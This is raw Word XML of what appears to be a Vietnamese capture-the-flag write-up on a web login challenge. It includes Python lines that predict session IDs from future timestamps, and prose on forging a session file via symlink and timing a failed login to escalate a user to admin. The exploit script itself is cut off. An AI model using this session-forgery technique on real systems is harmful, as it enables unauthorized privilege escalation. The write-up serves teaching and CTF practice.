            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F8CD0A8" w14:textId="77777777" w:rsidR="00DE5C79" w:rsidRPr="00DE5C79" w:rsidRDefault="00DE5C79" w:rsidP="00DE5C79">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5C79">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="082DABDB" w14:textId="77777777" w:rsidR="00DE5C79" w:rsidRPr="00DE5C79" w:rsidRDefault="00DE5C79" w:rsidP="00DE5C79">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5C79">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8688" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B26968C" w14:textId="77777777" w:rsidR="00DE5C79" w:rsidRPr="00DE5C79" w:rsidRDefault="00DE5C79" w:rsidP="00DE5C79">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5C79">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>future_timestamp = int(time.time()) + 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="747A889E" w14:textId="4DB11CEA" w:rsidR="00DE5C79" w:rsidRPr="00DE5C79" w:rsidRDefault="00DE5C79" w:rsidP="00DE5C79">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5C79">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>session_id = hashlib.sha256(str(future_timestamp).encode()).hexdigest()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D22D071" w14:textId="77777777" w:rsidR="00C33316" w:rsidRDefault="00C33316" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35682978" w14:textId="2AA6694F" w:rsidR="00DE5C79" w:rsidRDefault="00C33316" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C33316">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C65F99B" wp14:editId="69183645">
            <wp:extent cx="5731510" cy="3623310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="179843642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6428" name="Picture 1" descr="A screen shot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3623310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="647AAF52" w14:textId="0669AB9D" w:rsidR="00285BC9" w:rsidRPr="00285BC9" w:rsidRDefault="00285BC9" w:rsidP="00DE5C79">
      <w:r w:rsidRPr="00285BC9">
        <w:t>Thực hiện tạo file nén:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C753E9" w14:textId="218DB700" w:rsidR="00460B6D" w:rsidRDefault="00460B6D" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460B6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54B24541" wp14:editId="3D02E11D">
            <wp:extent cx="5731510" cy="1072515"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="38639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366" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1072515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC5099C" w14:textId="7C6AACF1" w:rsidR="00285BC9" w:rsidRPr="00285BC9" w:rsidRDefault="00285BC9" w:rsidP="00DE5C79">
      <w:r w:rsidRPr="00285BC9">
        <w:t>Thành công tạo 1 file session trong thư mục /tmp/sessions/abcdef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291DB1CE" w14:textId="2714282B" w:rsidR="00891F49" w:rsidRDefault="00891F49" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891F49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B55B3C4" wp14:editId="3256D3D3">
            <wp:extent cx="5731510" cy="602615"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="186521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3027" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="602615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1227D908" w14:textId="77777777" w:rsidR="007F6C1C" w:rsidRDefault="007F6C1C" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15347479" w14:textId="77777777" w:rsidR="007F6C1C" w:rsidRDefault="007F6C1C" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7423D01B" w14:textId="77777777" w:rsidR="007F6C1C" w:rsidRDefault="007F6C1C" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481C97C4" w14:textId="77777777" w:rsidR="007F6C1C" w:rsidRDefault="007F6C1C" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210AD8B2" w14:textId="77777777" w:rsidR="007F6C1C" w:rsidRDefault="007F6C1C" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E956C7A" w14:textId="77777777" w:rsidR="007F6C1C" w:rsidRDefault="007F6C1C" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D11557" w14:textId="712CAA6E" w:rsidR="007F6C1C" w:rsidRPr="007F6C1C" w:rsidRDefault="002053E8" w:rsidP="007F6C1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002053E8">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Thực hiện gửi các yêu cầu đăng nhập (login request) nhằm tạo ra các phiên làm việc (session), từ đó phân tích và xác định phiên tương ứng với session đã được tạo bởi </w:t>
      </w:r>
      <w:r w:rsidR="007F6C1C">
        <w:t>script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3468DF37" w14:textId="3A71E8CB" w:rsidR="001D63AA" w:rsidRDefault="001D63AA" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D63AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EFC7409" wp14:editId="1817311E">
            <wp:extent cx="5731510" cy="2956560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2119127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7829" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2956560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00182AC5" w14:textId="07D1C48B" w:rsidR="007F6C1C" w:rsidRPr="00D37FD4" w:rsidRDefault="007F6C1C" w:rsidP="00DE5C79">
      <w:r w:rsidRPr="00D37FD4">
        <w:t xml:space="preserve">Kiểm tra </w:t>
      </w:r>
      <w:r w:rsidR="00D37FD4" w:rsidRPr="00D37FD4">
        <w:t>file session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185F1E13" w14:textId="4FF2A76C" w:rsidR="001D63AA" w:rsidRDefault="001D63AA" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D63AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B0DAFBB" wp14:editId="0CEAD34F">
            <wp:extent cx="5731510" cy="623570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="16921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4186" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="623570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7332CCB8" w14:textId="30FD810F" w:rsidR="00F20E0E" w:rsidRDefault="00D37FD4" w:rsidP="00A00B46">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00B46">
        <w:t xml:space="preserve">Kết quả cho thấy rằng file session đã bị hệ thống ghi đè lại khiển role từ admin trở lại </w:t>
      </w:r>
      <w:r w:rsidR="004743B8" w:rsidRPr="00A00B46">
        <w:t xml:space="preserve">user. Điều này </w:t>
      </w:r>
      <w:r w:rsidR="00A00B46" w:rsidRPr="00A00B46">
        <w:t>cho thấy rằng không thể thực hiện leo thang đặc quyền bằng</w:t>
      </w:r>
      <w:r w:rsidR="00D070C3">
        <w:t xml:space="preserve"> cách</w:t>
      </w:r>
      <w:r w:rsidR="00A00B46" w:rsidRPr="00A00B46">
        <w:t xml:space="preserve"> này được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0835CD3A" w14:textId="62F7875C" w:rsidR="00D070C3" w:rsidRPr="00A00B46" w:rsidRDefault="00D070C3" w:rsidP="00A00B46">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Khi tiếp tục kiểm tra source code, mình phát hiện rằng khi login, sessionID đã được tạo trước đó và lưu </w:t>
      </w:r>
      <w:r w:rsidR="00505869">
        <w:t xml:space="preserve">cùng với username đã nhập </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trong redis thông qua </w:t>
      </w:r>
      <w:r w:rsidR="00505869">
        <w:t>PrepareSession. Sau khi lưu xong, hệ thống mới thực hiện kiểm tra username và password. Nếu thành công mới thực hiện lưu sesion thông qua hàm CreateSession:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689313E6" w14:textId="728DA4BC" w:rsidR="00F20E0E" w:rsidRDefault="00861F96" w:rsidP="00DE5C79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00861F96">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EF5AB85" wp14:editId="31078CE3">
            <wp:extent cx="5731510" cy="2760345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1340866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6874" name="Picture 1" descr="A screen shot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2760345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A39005" w14:textId="32614EC4" w:rsidR="00505869" w:rsidRDefault="00505869" w:rsidP="00DE5C79">
      <w:r w:rsidRPr="00505869">
        <w:t>Phân tích hàm CreateSession:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFEF020" w14:textId="35D22891" w:rsidR="00ED40BE" w:rsidRDefault="00ED40BE" w:rsidP="00DE5C79">
      <w:r w:rsidRPr="00ED40BE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A6B09DB" wp14:editId="3F1F9491">
            <wp:extent cx="5731510" cy="3174365"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="2334059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596" name="Picture 1" descr="A screen shot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3174365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A06726" w14:textId="78DC8091" w:rsidR="00ED40BE" w:rsidRDefault="00ED40BE" w:rsidP="004B52A9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004B52A9">
        <w:t xml:space="preserve">Hàm này có chức năng thực hiện tạo </w:t>
      </w:r>
      <w:r w:rsidR="00A90287" w:rsidRPr="004B52A9">
        <w:t xml:space="preserve">và lưu </w:t>
      </w:r>
      <w:r w:rsidRPr="004B52A9">
        <w:t xml:space="preserve">ra file sesion chứa các thông tin xác </w:t>
      </w:r>
      <w:r w:rsidR="00A90287" w:rsidRPr="004B52A9">
        <w:t xml:space="preserve">thực. Bingo, đây chính là key của bài này. Vì SessionID </w:t>
      </w:r>
      <w:r w:rsidR="002332DD" w:rsidRPr="004B52A9">
        <w:t xml:space="preserve">và </w:t>
      </w:r>
      <w:r w:rsidR="00A90287" w:rsidRPr="004B52A9">
        <w:t xml:space="preserve">được lưu trên redis và khi cần xác thực người dùng, hệ thống sẽ sử dụng SessionID này để </w:t>
      </w:r>
      <w:r w:rsidR="002332DD" w:rsidRPr="004B52A9">
        <w:t xml:space="preserve">tìm kiếm file trong tập tin lưu trữ session. Mà khi ta login vào hệ thống </w:t>
      </w:r>
      <w:r w:rsidR="00B62357" w:rsidRPr="004B52A9">
        <w:t xml:space="preserve">với username đúng và password thì hệ thống vẫn </w:t>
      </w:r>
      <w:r w:rsidR="002332DD" w:rsidRPr="004B52A9">
        <w:t xml:space="preserve">tạo </w:t>
      </w:r>
      <w:r w:rsidR="00B62357" w:rsidRPr="004B52A9">
        <w:t xml:space="preserve">và lưu SesionID trên redis nhưng lại không thực hiện tạo file tương ứng. Chúng ta chỉ cần tạo 1 file session ở thời điểm </w:t>
      </w:r>
      <w:r w:rsidR="003E7F38" w:rsidRPr="004B52A9">
        <w:t xml:space="preserve">sau đó và dùng symlink để lưu trước trên hệ thống, sau đó thực hiện login với username đúng password sai vào thời điểm trùng </w:t>
      </w:r>
      <w:r w:rsidR="004B52A9" w:rsidRPr="004B52A9">
        <w:t>khớp là đã thành công đổi quyền của user thành admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B371BDF" w14:textId="59B233B7" w:rsidR="004B52A9" w:rsidRPr="004B52A9" w:rsidRDefault="004B52A9" w:rsidP="004B52A9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện tạo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390"/>
      </w:tblGrid>
      <w:tr w:rsidR="006208D4" w:rsidRPr="006208D4" w14:paraId="13B92640" w14:textId="77777777" w:rsidTr="006B2E0C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BC68336" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006B2E0C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39A49C8A" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B161F97" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AC6CC4F" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5798AE44" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1762500E" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31A5EB66" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45447861" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ECAF049" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A71128F" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EE1E378" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AE0659C" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA6E48B" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="769A7E49" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FEBB5E6" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30AE0A4D" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FCE0C55" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EBBE2FC" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48FFA9AC" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="131D1A4E" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E86EE9D" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="797CD36D" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44C7E6FF" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
